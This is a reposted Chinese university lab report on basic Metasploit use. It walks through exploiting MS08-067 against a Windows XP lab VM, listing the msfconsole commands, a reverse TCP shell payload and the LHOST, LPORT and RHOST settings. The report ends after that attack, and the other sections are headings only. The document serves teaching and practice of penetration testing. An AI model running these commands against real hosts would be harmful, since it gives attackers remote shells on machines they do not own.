码迷,mamicode.com
首页 > 其他好文 > 详细

20155205 郝博雅 Exp5 MSF基础应用

时间:2018-04-18 21:16:28      阅读:154      评论:0      收藏:0      [点我收藏+]

标签:eve   gen   防火   漏洞   ado   tool   com   查看   LLC   

20155205 郝博雅 Exp5 MSF基础应用

一、实验目标

  • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.一个主动攻击实践,如ms08_067; (1分)

  1. 一个针对浏览器的攻击,如ms11_050;(1分)

  2. 一个针对客户端的攻击,如Adobe;(1分)

  3. 成功应用任何一个辅助模块。(0.5分)

基础问题回答:用自己的话解释什么是exploit,payload,encode?

  • exploit相当于一个载体,把攻击代码运送到耙机中;payload相当于shellcode;encode一是为了避免payload中出现坏字符,从而影响payload的功能,二是为了实现免杀。

二、实验内容

主动攻击:ms08_067漏洞攻击

靶机: windows XP SP3(English)

攻击机:kali

  • 输入msfconsole进入控制台,输入search ms08_067指令查询一下针对该漏洞可以运用的攻击模块:

技术分享图片

  • 输入use exploit/windows/smb/ms08_067_netapi使用该模块:

技术分享图片

  • 使用show payloads查看可以供我们使用的payload并找到一个可用的攻击载荷:

技术分享图片

  • set payload generic/shell_reverse_tcp即tcp反向回连设置payload

  • 使用指令show options查看我们需要设置的参数,需要设置一个RHOST(靶机的IP地址)和一个LHOST(攻击机的IP地址)。并且看到target是0,即自动选择目标系统类型,就不用再设置了。

技术分享图片

  • 使用set LHOST 192.168.206.129set LPORT 5205设置本机地址和端口,使用set RHOST 192.168.206.135设置耙机地址,使用show options查看设置结果:

技术分享图片

  • 接着使用exploit指令开始攻击,出现了一个错误:

技术分享图片

  • 关闭XP的防火墙:

技术分享图片

  • 攻击成功,获取了耙机的shell:

技术分享图片

对浏览器攻击:ms10_046漏洞攻击

对Adobe的漏洞攻击:adobe_toolbutton

辅助模块的应用:smb_version

20155205 郝博雅 Exp5 MSF基础应用

标签:eve   gen   防火   漏洞   ado   tool   com   查看   LLC   

原文地址:https://www.cnblogs.com/haoliberale/p/8877298.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!